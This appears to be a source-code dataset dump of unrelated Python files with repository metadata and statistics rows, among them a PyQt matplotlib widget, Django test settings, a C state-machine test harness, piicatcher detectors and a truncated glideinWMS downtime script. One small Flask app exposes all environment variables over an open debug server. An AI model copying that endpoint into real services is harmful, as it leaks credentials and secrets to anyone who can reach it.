| 39.594595 | 373 | 0.675768 | 287 | 2,930 | 6.853659 | 0.376307 | 0.060498 | 0.082359 | 0.08846 | 0.664972 | 0.655821 | 0.655821 | 0.655821 | 0.640569 | 0.592781 | 0 | 0.012037 | 0.262799 | 2,930 | 73 | 374 | 40.136986 | 0.898611 | 0.105461 | 0 | 0 | 0 | 0.103448 | 0.605215 | 0.09339 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.103448 | 0 | 0.275862 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
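The generated class above carries each HL7 concept as a `CodeSystemConcept` with `code`, `display`, and `definition` fields. A dependency-free sketch of that shape using a dataclass (field names follow FHIR's CodeSystem concept structure; the `Concept` class here is illustrative, not oops_fhir's actual type, and the definitions are abbreviated):

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Concept:
    code: str
    display: str
    definition: str

# Abbreviated definitions; the full text lives in the CodeSystem resource.
CONCEPTS = {
    c.code: c
    for c in (
        Concept("C", "conduction-indicator-based",
                "Defined via contextConductionCode/Ind (deprecated March 2010)."),
        Concept("I", "inferred",
                "Not explicitly defined; the recipient must infer conduction."),
        Concept("V", "vocabulary-based",
                "Defined via blocked-context attributes and vocabulary properties."),
    )
}

print(CONCEPTS["V"].display)  # -> vocabulary-based
```

Indexing the concepts by code gives O(1) lookup, which is how generated terminology modules are typically consumed.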
7490be062bf8f49932d88edf6304cbe160d7101a | 1,484 | py | Python | matplotlib_widget.py | kkgg0521/-Oscilloscope-host-computer | 2035ef5a2ccb26b563425dab560ee8002aade413 | [
"MIT"
] | null | null | null | matplotlib_widget.py | kkgg0521/-Oscilloscope-host-computer | 2035ef5a2ccb26b563425dab560ee8002aade413 | [
"MIT"
] | null | null | null | matplotlib_widget.py | kkgg0521/-Oscilloscope-host-computer | 2035ef5a2ccb26b563425dab560ee8002aade413 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
@Time : 2022/1/11 14:30
@Auth : 吕伟康
@File :matplotlib_widget.py
"""
# -*- coding: utf-8 -*-
"""
@Time : 2021/12/15 10:52
@Auth : 吕伟康
@File :matplotlib_widget.py
"""
import numpy as np
from PyQt5.QtCore import QTimer
from PyQt5.QtWidgets import QWidget, QVBoxLayout
from matplotlib.backends.backend_qt5 import NavigationToolbar2QT as NavigationToolbar
from gui.Widget.Diag_oscillograph_new.Figure import MyMplCanvas
class MatPlotLibWidget(QWidget):
def __init__(self, parent=None):
super(MatPlotLibWidget, self).__init__(parent)
self.init()
time_test = QTimer(self)
time_test.timeout.connect(self.updatanarray)
# time_test.start(500)
self.a = [1,2,3]
def updatanarray(self):
        '''Data source'''
self.set_narry_xdata(self.a)
self.set_narry_ydata(self.a)
def init(self):
self.layout = QVBoxLayout(self)
self.mpl = MyMplCanvas(self, width=5, height=4, dpi=100)
self.mpl_ntb = NavigationToolbar(self.mpl, self)
self.layout.addWidget(self.mpl)
self.layout.addWidget(self.mpl_ntb)
def set_narry_xdata(self, newvalue):
self.mpl.set_narry_xdata(newvalue)
def set_narry_ydata(self, newvalue):
self.mpl.set_narry_ydata(newvalue)
def close_updata(self):
self.mpl.close_updata()
def start_updata(self):
        '''Start refreshing'''
self.mpl.start_updata() | 28 | 86 | 0.643531 | 189 | 1,484 | 4.873016 | 0.412698 | 0.068404 | 0.042345 | 0.030402 | 0.178067 | 0.121607 | 0 | 0 | 0 | 0 | 0 | 0.035273 | 0.235849 | 1,484 | 53 | 87 | 28 | 0.776896 | 0.093666 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.241379 | false | 0 | 0.172414 | 0 | 0.448276 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
74919c44ebaafcbfd0dc0243217b7977319b1e97 | 247 | py | Python | tests/django_app/settings.py | Menda/factory-boy-loader | f45504195df5b805a5a5ebde210dfd7ee1bd6939 | [
"MIT"
] | null | null | null | tests/django_app/settings.py | Menda/factory-boy-loader | f45504195df5b805a5a5ebde210dfd7ee1bd6939 | [
"MIT"
] | null | null | null | tests/django_app/settings.py | Menda/factory-boy-loader | f45504195df5b805a5a5ebde210dfd7ee1bd6939 | [
"MIT"
] | null | null | null | """
Settings for tests.
"""
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'example.sqlite',
},
}
INSTALLED_APPS = [
'tests.django_app'
]
MIDDLEWARE_CLASSES = ()
SECRET_KEY = 'testing.'
| 12.35 | 47 | 0.574899 | 23 | 247 | 6 | 0.913043 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005348 | 0.242915 | 247 | 19 | 48 | 13 | 0.73262 | 0.076923 | 0 | 0 | 0 | 0 | 0.368182 | 0.118182 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
749c7e0a26e0a1a459f6996d37a957ad5e2ebb4e | 906 | py | Python | bgg4py/valueobject/hot_item.py | hiroaqii/bgg4py | ba3d8ef31f23b8ec6464c1142672b5e7b6f3c87d | [
"MIT"
] | 1 | 2020-06-07T07:10:21.000Z | 2020-06-07T07:10:21.000Z | bgg4py/valueobject/hot_item.py | hiroaqii/bgg4py | ba3d8ef31f23b8ec6464c1142672b5e7b6f3c87d | [
"MIT"
] | null | null | null | bgg4py/valueobject/hot_item.py | hiroaqii/bgg4py | ba3d8ef31f23b8ec6464c1142672b5e7b6f3c87d | [
"MIT"
] | null | null | null | from collections import OrderedDict
from typing import List, Optional, Union
from .bgg import Bgg
class Item(Bgg):
id: int
rank: int
name: str
yearpublished: Optional[int]
thumbnail: str
@classmethod
def create(cls, item: OrderedDict):
_item = Item(
id=Bgg.parse_int(item.get("@id")),
rank=Bgg.parse_int(item.get("@rank")),
name=Bgg.get_primary_name(item.get("name")),
yearpublished=Bgg.dict_value_to_int(item.get("yearpublished")),
thumbnail=item.get("thumbnail", {}).get("@value"),
)
return _item
class HotItem(Bgg):
items: List[Item]
@classmethod
def create(cls, items: Union[OrderedDict, List[OrderedDict]]):
if type(items) == OrderedDict:
items = [items]
_items = [Item.create(item) for item in items]
return HotItem(items=_items)
| 23.842105 | 75 | 0.610375 | 108 | 906 | 5.018519 | 0.324074 | 0.064576 | 0.055351 | 0.084871 | 0.066421 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.263797 | 906 | 37 | 76 | 24.486486 | 0.812594 | 0 | 0 | 0.074074 | 0 | 0 | 0.04415 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.074074 | false | 0 | 0.111111 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
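`HotItem.create` above accepts either a single `OrderedDict` or a list of them, because XML-to-dict parsers collapse one-element collections into a bare mapping. A small sketch of that normalization on its own:

```python
from collections import OrderedDict

def as_list(value):
    """xmltodict-style payloads yield a bare dict for one item, a list for many."""
    if isinstance(value, dict):  # OrderedDict is a dict subclass, so this covers both
        return [value]
    return list(value)

one = OrderedDict([("@id", "1")])
many = [OrderedDict([("@id", "1")]), OrderedDict([("@id", "2")])]
print(len(as_list(one)), len(as_list(many)))  # -> 1 2
```

Normalizing early like this lets the rest of the code iterate unconditionally, as the list comprehension in `HotItem.create` does.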
749dc9159b829abb30d26a06f143fffa8c779d95 | 663 | py | Python | tests/update_golds.py | leonardt/magma | d3e8c9500ec3b167df8ed067e0c0305781c94ab6 | [
"MIT"
] | 167 | 2017-10-08T00:59:22.000Z | 2022-02-08T00:14:39.000Z | tests/update_golds.py | leonardt/magma | d3e8c9500ec3b167df8ed067e0c0305781c94ab6 | [
"MIT"
] | 719 | 2017-08-29T17:58:28.000Z | 2022-03-31T23:39:18.000Z | tests/update_golds.py | leonardt/magma | d3e8c9500ec3b167df8ed067e0c0305781c94ab6 | [
"MIT"
] | 14 | 2017-09-01T03:25:16.000Z | 2021-11-05T13:30:24.000Z | """
Expected to be run from repo root
"""
import shutil
import os
def copy_golds(dir_path):
for f in os.listdir(os.path.join(dir_path, "gold")):
try:
shutil.copy(
os.path.join(dir_path, "build", f),
os.path.join(dir_path, "gold", f)
)
        except FileNotFoundError:
# corresponding build has different name or extra file
pass
copy_golds("tests")
for name in os.listdir("tests"):
if not os.path.isdir(os.path.join("tests", name)):
continue
if "gold" in os.listdir(os.path.join("tests", name)):
copy_golds(os.path.join("tests", name))
| 23.678571 | 66 | 0.582202 | 94 | 663 | 4.031915 | 0.425532 | 0.110818 | 0.158311 | 0.102902 | 0.364116 | 0.195251 | 0 | 0 | 0 | 0 | 0 | 0 | 0.286576 | 663 | 27 | 67 | 24.555556 | 0.801269 | 0.131222 | 0 | 0 | 0 | 0 | 0.073944 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0.058824 | 0.117647 | 0 | 0.176471 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
74a16456b6f97b4da59fe2f3e3279a4ce95a7134 | 5,647 | py | Python | test_machine.py | technosvitman/statemachine | e1e80ac364c9c9916785ba6c4bad3e434cc964db | [
"MIT"
] | null | null | null | test_machine.py | technosvitman/statemachine | e1e80ac364c9c9916785ba6c4bad3e434cc964db | [
"MIT"
] | 2 | 2021-08-10T09:38:59.000Z | 2021-08-22T15:52:37.000Z | test_machine.py | technosvitman/statemachine | e1e80ac364c9c9916785ba6c4bad3e434cc964db | [
"MIT"
] | null | null | null |
import sys
import io
import time
import argparse
import re
from pyctest import *
def getState(test):
return test.c_test_machine.current_state
'''
@see PycTestCase
'''
class TestStartAndTransition(PycTestCase):
def __init__(self):
        super(TestStartAndTransition, self).__init__()
def runTest(self):
self.c_test_machine_Init()
self.assertEqual(getState(self), \
self.c_test_machine_state_eSTATE1)
self.c_test_machine_Compute( \
self.c_test_machine_event_eEVENT_1_2, \
self.NULL())
self.assertEqual(getState(self), \
self.c_test_machine_state_eSTATE2)
'''
@see PycTestCase
'''
class TestConditionalTransition(PycTestCase):
def __init__(self):
        super(TestConditionalTransition, self).__init__()
def runTest(self):
self.c_test_machine_Init()
self.c_test_machine_Compute( \
self.c_test_machine_event_eEVENT_1_2, \
self.NULL())
self.c_cond1[0] = 0
self.c_cond2[0] = 0
self.c_cond3[0] = 0
self.c_test_machine_Compute( \
self.c_test_machine_event_eEVENT2, \
self.NULL())
self.assertEqual(getState(self), \
self.c_test_machine_state_eSTATE2)
self.c_cond1[0] = 1
self.c_test_machine_Compute( \
self.c_test_machine_event_eEVENT2, \
self.NULL())
self.assertEqual(getState(self), \
self.c_test_machine_state_eSTATE1)
self.c_cond1[0] = 0
self.c_cond2[0] = 1
self.c_test_machine_Compute( \
self.c_test_machine_event_eEVENT1, \
self.NULL())
self.assertEqual(getState(self), \
self.c_test_machine_state_eSTATE2)
self.c_cond2[0] = 0
self.c_cond3[0] = 1
self.c_test_machine_Compute( \
self.c_test_machine_event_eEVENT2, \
self.NULL())
self.assertEqual(getState(self), \
self.c_test_machine_state_eSTATE3)
'''
@see PycTestCase
'''
class TestCurrentStateMemoryFailure(PycTestCase):
def __init__(self):
        super(TestCurrentStateMemoryFailure, self).__init__()
def runTest(self):
self.c_test_machine_Init()
self.c_test_machine.current_state = self.c_test_machine_state_eSTATE2
self.c_corruption[0] = 0
self.assertEqual(self.c_corruption[0], 0)
self.c_test_machine_Compute( \
self.c_test_machine_event_eEVENT_1_2, \
self.NULL())
self.assertEqual(self.c_corruption[0], 2)
'''
@see PycTestCase
'''
class TestNewStateMemoryFailure(PycTestCase):
def __init__(self):
        super(TestNewStateMemoryFailure, self).__init__()
def runTest(self):
self.c_test_machine_Init()
self.c_test_machine.compl_new_state = self.c_test_machine_state_eSTATE3
self.c_corruption[0] = 0
self.assertEqual(self.c_corruption[0], 0)
self.c_test_machine_Compute( \
self.c_test_machine_event_eEVENT2, \
self.NULL())
self.assertEqual(getState(self), \
self.c_test_machine_state_eSTATE1)
self.assertEqual(self.c_corruption[0], 1)
class TestMachine:
MODULE_FILE="statemachine"
MACHINE_FILE="test_machine"
def __init__(self):
self.__loader = PycTester()
'''
@brief build library from c file
'''
def build(self):
self.__loader.load_source("""
int corrupt = 0;
#define statemachineASSERT_CORRUPT(cond) if(!(cond)){corrupt++;}
int * corruption = &corrupt;
""");
self.__loader.load_module(TestMachine.MODULE_FILE)
self.__loader.load_source("""
int condition1 = 0;
int condition2 = 0;
int condition3 = 0;
int * cond1 = &condition1;
int * cond2 = &condition2;
int * cond3 = &condition3;
""");
self.__loader.load_module(TestMachine.MACHINE_FILE)
self.__loader.load_header("""
extern int * cond1;
extern int * cond2;
extern int * cond3;
extern int * corruption;
extern statemachine_t test_machine;
""");
self.__loader.build("_testmachine")
'''
@brief unitary test for C library
'''
def unitest(self):
print("================Unitary Test==============")
print("Generate test cases")
self.__loader.appendTest(TestStartAndTransition())
self.__loader.appendTest(TestConditionalTransition())
self.__loader.appendTest(TestCurrentStateMemoryFailure())
self.__loader.appendTest(TestNewStateMemoryFailure())
self.__loader.run()
parser = argparse.ArgumentParser(description='Statemachine tester')
parser.add_argument("-u", default=False, action="store_true")
parser.add_argument("-b", default=False, action="store_true")
args = parser.parse_args()
tester = TestMachine()
if args.u or args.b:
tester.build()
if args.u:
tester.unitest() | 27.817734 | 79 | 0.552506 | 566 | 5,647 | 5.136042 | 0.164311 | 0.077399 | 0.132095 | 0.170623 | 0.589955 | 0.523564 | 0.493292 | 0.493292 | 0.48366 | 0.461644 | 0 | 0.019555 | 0.347972 | 5,647 | 203 | 80 | 27.817734 | 0.769962 | 0 | 0 | 0.515625 | 0 | 0 | 0.141436 | 0.014365 | 0 | 0 | 0 | 0 | 0.09375 | 1 | 0.09375 | false | 0 | 0.046875 | 0.007813 | 0.203125 | 0.015625 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
74a5439f43793637956270c9f0e328654581f7c0 | 382 | py | Python | app.py | arthuralvim/deploy-aws-image | 401b2e6ad63e256dce1028b83b1a9d02cccfd919 | [
"MIT"
] | null | null | null | app.py | arthuralvim/deploy-aws-image | 401b2e6ad63e256dce1028b83b1a9d02cccfd919 | [
"MIT"
] | null | null | null | app.py | arthuralvim/deploy-aws-image | 401b2e6ad63e256dce1028b83b1a9d02cccfd919 | [
"MIT"
] | null | null | null | import os
from flask import Flask
from flask_restful import Resource, Api
app = Flask(__name__)
api = Api(app)
class EnvironmentVariablesEndpoint(Resource):
def get(self):
return [(key, os.environ[key]) for key in os.environ.keys()]
api.add_resource(EnvironmentVariablesEndpoint, '/')
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0', port=8000)
| 20.105263 | 68 | 0.712042 | 53 | 382 | 4.867925 | 0.566038 | 0.023256 | 0.023256 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.024845 | 0.157068 | 382 | 18 | 69 | 21.222222 | 0.776398 | 0 | 0 | 0 | 0 | 0 | 0.041885 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.272727 | 0.090909 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
74a99769f198cde2e4a1b1b98de0e0682ce6f9f0 | 1,597 | py | Python | piicatcher/detectors.py | argos-education/piicatcher | 7370cad8a4938762311926e8ab3bc286232e7106 | [
"Apache-2.0"
] | 4 | 2019-07-10T08:52:56.000Z | 2019-10-23T13:58:18.000Z | piicatcher/detectors.py | argos-education/piicatcher | 7370cad8a4938762311926e8ab3bc286232e7106 | [
"Apache-2.0"
] | 11 | 2019-03-21T11:28:07.000Z | 2019-08-30T12:13:28.000Z | piicatcher/detectors.py | argos-education/piicatcher | 7370cad8a4938762311926e8ab3bc286232e7106 | [
"Apache-2.0"
] | 2 | 2019-03-21T11:06:49.000Z | 2019-03-27T06:05:52.000Z | import inspect
from abc import ABC, abstractmethod
from typing import Optional, Type
import catalogue
from dbcat.catalog.models import CatColumn
from dbcat.catalog.pii_types import PiiType
class Detector(ABC):
"""Scanner abstract class that defines required methods"""
name: str
class MetadataDetector(Detector):
@abstractmethod
def detect(self, column: CatColumn) -> Optional[PiiType]:
"""Scan the text and return an array of PiiTypes that are found"""
class DatumDetector(Detector):
@abstractmethod
def detect(self, column: CatColumn, datum: str) -> Optional[PiiType]:
"""Scan the text and return an array of PiiTypes that are found"""
detector_registry = catalogue.create("piicatcher", "detectors", entry_points=True)
def register_detector(detector: Type["Detector"]) -> Type["Detector"]:
"""Register a detector for use.
You can use ``register_detector(NewDetector)`` after your detector definition to automatically
register it.
.. code:: pycon
>>> import piicatcher
>>> class NewDetector(piicatcher.detectors.Detector):
... pass
>>> piicatcher.detectors.register_detector(NewDetector)
<class 'piicatcher.detectors.catalogue.NewDetector'>
:param detector: The ``Detector`` to register with the scrubadub detector configuration.
:type detector: Detector class
"""
if not inspect.isclass(detector):
raise ValueError("detector should be a class, not an instance.")
detector_registry.register(detector.name, func=detector)
return detector
| 29.036364 | 98 | 0.713212 | 183 | 1,597 | 6.185792 | 0.437158 | 0.067138 | 0.028269 | 0.05477 | 0.201413 | 0.201413 | 0.201413 | 0.113074 | 0.113074 | 0.113074 | 0 | 0 | 0.191609 | 1,597 | 54 | 99 | 29.574074 | 0.87684 | 0.418284 | 0 | 0.095238 | 0 | 0 | 0.091541 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0.047619 | 0.285714 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
7766354d83244c354a73d41b8ca559a889302218 | 17,570 | py | Python | factory/manageFactoryDowntimes.py | bbockelm/glideinWMS | a2b39e3d4ff6c4527efad54b1eefe728a4ec9d18 | [
"BSD-3-Clause"
] | null | null | null | factory/manageFactoryDowntimes.py | bbockelm/glideinWMS | a2b39e3d4ff6c4527efad54b1eefe728a4ec9d18 | [
"BSD-3-Clause"
] | 3 | 2015-12-02T19:37:45.000Z | 2016-01-20T03:21:48.000Z | factory/manageFactoryDowntimes.py | bbockelm/glideinWMS | a2b39e3d4ff6c4527efad54b1eefe728a4ec9d18 | [
"BSD-3-Clause"
] | 1 | 2015-12-01T23:02:41.000Z | 2015-12-01T23:02:41.000Z | #!/usr/bin/env python
#
# Project:
# glideinWMS
#
# File Version:
#
# Description:
# This program allows to add announced downtimes
# as well as handle unexpected downtimes
#
import os.path
import os
import time,string
import sys
import re
STARTUP_DIR=sys.path[0]
sys.path.append(os.path.join(STARTUP_DIR,"../../"))
from glideinwms.lib import ldapMonitor
from glideinwms.lib import condorMonitor
from glideinwms.creation.lib import cgWDictFile
from glideinwms.creation.lib import cgWConsts
from glideinwms.factory import glideFactoryConfig
from glideinwms.factory import glideFactoryDowntimeLib
def usage():
print "Usage:"
print " manageFactoryDowntimes.py -dir factory_dir -entry ['all'|'factory'|'entries'|entry_name] -cmd [command] [options]"
print "where command is one of:"
print " add - Add a scheduled downtime period"
print " down - Put the factory down now(+delay)"
print " up - Get the factory back up now(+delay)"
print " ress - Set the up/down based on RESS status"
print " bdii - Set the up/down based on bdii status"
print " ress+bdii - Set the up/down based both on RESS and bdii status"
print " check - Report if the factory is in downtime now(+delay)"
print " vacuum - Remove all expired downtime info"
print "Other options:"
print " -start [[[YYYY-]MM-]DD-]HH:MM[:SS] (start time for adding a downtime)"
print " -end [[[YYYY-]MM-]DD-]HH:MM[:SS] (end time for adding a downtime)"
print " -delay [HHh][MMm][SS[s]] (delay a downtime for down, up, and check cmds)"
print " -ISinfo 'CEStatus' (attribute used in ress/bdii for creating downtimes)"
print " -security SECURITY_CLASS (restricts a downtime to users of that security class)"
print " (If not specified, the downtime is for all users.)"
print " -frontend SECURITY_NAME (Limits a downtime to one frontend)"
print " -comment \"Comment here\" (user comment for the downtime. Not used by WMS.)"
print
# [[[YYYY-]MM-]DD-]HH:MM[:SS]
def strtxt2time(timeStr):
deftime=time.localtime(time.time())
year=deftime[0]
month=deftime[1]
day=deftime[2]
seconds=0
darr=timeStr.split('-')
if len(darr)>1: # we have at least part of the date
timeStr=darr[-1]
day=long(darr[-2])
if len(darr)>2:
month=long(darr[-3])
if len(darr)>3:
year=long(darr[-4])
tarr=timeStr.split(':')
hours=long(tarr[0])
minutes=long(tarr[1])
if len(tarr)>2:
seconds=long(tarr[2])
outtime=time.mktime((year, month, day, hours, minutes, seconds, 0, 0, -1))
return outtime
# [[[YYYY-]MM-]DD-]HH:MM[:SS]
# or
# unix_time
def str2time(timeStr):
#if (timeStr is None) or (timeStr=="None") or (timeStr==""):
# return time.localtime(time.time())
if len(timeStr.split(':',1))>1:
# has a :, so it must be a text representation
return strtxt2time(timeStr)
else:
print timeStr
# should be a simple number
return long(timeStr)
# Create an array for each value in the frontend descript file
def get_security_classes(factory_dir):
sec_array=[];
frontendDescript=glideFactoryConfig.ConfigFile(factory_dir+"/frontend.descript",lambda s:s)
for fe in frontendDescript.data.keys():
for sec_class in frontendDescript.data[fe]['usermap']:
sec_array.append(sec_class);
return sec_array;
# Create an array for each frontend in the frontend descript file
def get_frontends(factory_dir):
frontendDescript=glideFactoryConfig.ConfigFile(factory_dir+"/frontend.descript",lambda s:s)
return frontendDescript.data.keys();
# Create an array for each entry in the glidein descript file
def get_entries(factory_dir):
glideinDescript=glideFactoryConfig.GlideinDescript()
#glideinDescript=glideFactoryConfig.ConfigFile(factory_dir+"/glidein.descript",lambda s:s)
return string.split(glideinDescript.data['Entries'],',');
#
#
def get_downtime_fd(entry_name,cmdname):
try:
# New style has config all in the factory file
#if entry_name=='factory':
config=glideFactoryConfig.GlideinDescript()
#else:
# config=glideFactoryConfig.JobDescript(entry_name)
except IOError:
raise RuntimeError, "Failed to load config for %s"%entry_name
fd=glideFactoryDowntimeLib.DowntimeFile(config.data['DowntimesFile'])
return fd
def get_downtime_fd_dict(entry_or_id,cmdname,opt_dict):
out_fds={}
if entry_or_id in ('entries','All'):
glideinDescript=glideFactoryConfig.GlideinDescript()
entries=string.split(glideinDescript.data['Entries'],',')
for entry in entries:
out_fds[entry]=get_downtime_fd(entry,cmdname)
if (entry_or_id=='All') and (not opt_dict.has_key("entries")):
out_fds['factory']=get_downtime_fd('factory',cmdname)
else:
out_fds[entry_or_id]=get_downtime_fd(entry_or_id,cmdname)
return out_fds
def add(entry_name,opt_dict):
down_fd=get_downtime_fd(entry_name,opt_dict["dir"])
start_time=str2time(opt_dict["start"])
end_time=str2time(opt_dict["end"])
sec_name=opt_dict["sec"]
frontend=opt_dict["frontend"]
down_fd.addPeriod(start_time=start_time,end_time=end_time,entry=entry_name,frontend=frontend,security_class=sec_name,comment=opt_dict["comment"])
return 0
# [HHh][MMm][SS[s]]
def delay2time(delayStr):
hours=0
minutes=0
seconds=0
harr=delayStr.split('h',1)
if len(harr)==2:
hours=long(harr[0])
delayStr=harr[1]
marr=delayStr.split('m',1)
if len(marr)==2:
minutes=long(marr[0])
delayStr=marr[1]
if delayStr[-1:]=='s':
delayStr=delayStr[:-1] # remove final s if present
if len(delayStr)>0:
seconds=long(delayStr)
return seconds+60*(minutes+60*hours)
def down(entry_name,opt_dict):
down_fd=get_downtime_fd(entry_name,opt_dict["dir"])
when=delay2time(opt_dict["delay"])
if (opt_dict["start"]=="None"):
when+=long(time.time())
else:
when+=str2time(opt_dict["start"]);
if (opt_dict["end"]=="None"):
end_time=None
else:
end_time=str2time(opt_dict["end"])
frontend=opt_dict["frontend"]
sec_name=opt_dict["sec"]
if not down_fd.checkDowntime(entry=entry_name, frontend=frontend, security_class=sec_name, check_time=when):
#only add a new line if not in downtime at that time
return down_fd.startDowntime(start_time=when,end_time=end_time,frontend=frontend,security_class=sec_name,entry=entry_name,comment=opt_dict["comment"])
else:
print "Entry is already down. (%s)" % down_fd.downtime_comment
return 0
def up(entry_name,opt_dict):
down_fd=get_downtime_fd(entry_name,opt_dict["dir"])
when=delay2time(opt_dict["delay"])
sec_name=opt_dict["sec"]
frontend=opt_dict["frontend"]
comment=opt_dict["comment"]
if (opt_dict["end"]=="None"):
when+=long(time.time())
else:
when+=str2time(opt_dict["end"]);
# commenting this check out since we could be in a downtime
# for certain security_classes/frontend, but if we specify
# -cmd up and -security All, etc, it should clear out all downtimes
#if (down_fd.checkDowntime(entry=entry_name, frontend=frontend, security_class=sec_name, check_time=when)or (sec_name=="All")):
rtn=down_fd.endDowntime(end_time=when,entry=entry_name,frontend=frontend,security_class=sec_name,comment=comment)
if (rtn>0):
return 0
else:
print "Entry is not in downtime."
return 1
# This function replaces "check", which does not take into account
# security classes. This function will read the downtimes file
# and parse it to determine whether the downtime is relevant to the
# security class
def printtimes(entry_or_id,opt_dict):
config_els=get_downtime_fd_dict(entry_or_id,opt_dict["dir"],opt_dict)
when=delay2time(opt_dict["delay"])+long(time.time())
entry_keys=config_els.keys()
entry_keys.sort()
for entry in entry_keys:
down_fd=config_els[entry]
down_fd.printDowntime(entry=entry, check_time=when)
# This function is now deprecated, replaced by printtimes
# as it does not take into account that an entry can be down for
# only some security classes.
def check(entry_or_id,opt_dict):
config_els=get_downtime_fd_dict(entry_or_id,opt_dict["dir"],opt_dict)
when=delay2time(opt_dict["delay"])
sec_name=opt_dict["sec"]
when+=long(time.time())
entry_keys=config_els.keys()
entry_keys.sort()
for entry in entry_keys:
down_fd=config_els[entry]
in_downtime=down_fd.checkDowntime(entry=entry, security_class=sec_name, check_time=when)
if in_downtime:
print "%s\tDown"%entry
else:
print "%s\tUp"%entry
return 0
def vacuum(entry_or_id,opt_dict):
config_els=get_downtime_fd_dict(entry_or_id,opt_dict["dir"],opt_dict)
entry_keys=config_els.keys()
entry_keys.sort()
for entry in entry_keys:
down_fd=config_els[entry]
down_fd.purgeOldPeriods()
return 0
def get_production_ress_entries(server,ref_dict_list):
production_entries=[]
condor_obj=condorMonitor.CondorStatus(pool_name=server)
condor_obj.load(constraint='(GlueCEInfoContactString=!=UNDEFINED)&&(GlueCEStateStatus=?="Production")',format_list=[])
condor_refs=condor_obj.fetchStored().keys()
#del condor_obj
for el in ref_dict_list:
ref=el['ref']
if ref in condor_refs:
production_entries.append(el['entry_name'])
return production_entries
def get_production_bdii_entries(server,ref_dict_list):
production_entries=[]
bdii_obj=ldapMonitor.BDIICEQuery(server)
bdii_obj.load()
bdii_obj.filterStatus(usable=True)
bdii_refs=bdii_obj.fetchStored().keys()
#del bdii_obj
for el in ref_dict_list:
ref=el['ref']
if ref in bdii_refs:
production_entries.append(el['entry_name'])
return production_entries
def infosys_based(entry_name,opt_dict,infosys_types):
# find out which entries I need to look at
# gather downtime fds for them
config_els={}
if entry_name=='factory':
return 0 # nothing to do... the whole factory cannot be controlled by infosys
elif entry_name in ('entries','all'):
# all==entries in this case, since there is nothing to do for the factory
glideinDescript=glideFactoryConfig.GlideinDescript()
entries=string.split(glideinDescript.data['Entries'],',')
for entry in entries:
config_els[entry]={}
else:
config_els[entry_name]={}
# load the infosys info
for entry in config_els.keys():
infosys_fd=cgWDictFile.InfoSysDictFile(cgWConsts.get_entry_submit_dir('.',entry),cgWConsts.INFOSYS_FILE)
infosys_fd.load()
if len(infosys_fd.keys)==0:
# entry not associated with any infosys, cannot be managed, ignore
del config_els[entry]
continue
compatible_infosys=False
for k in infosys_fd.keys:
infosys_type=infosys_fd[k][0]
if infosys_type in infosys_types:
compatible_infosys=True
break
if not compatible_infosys:
# entry not associated with a compatible infosys, cannot be managed, ignore
del config_els[entry]
continue
config_els[entry]['infosys_fd']=infosys_fd
if len(config_els.keys())==0:
return 0 # nothing to do
# all the remaining entries are handled by one of the supported infosys
# summarize
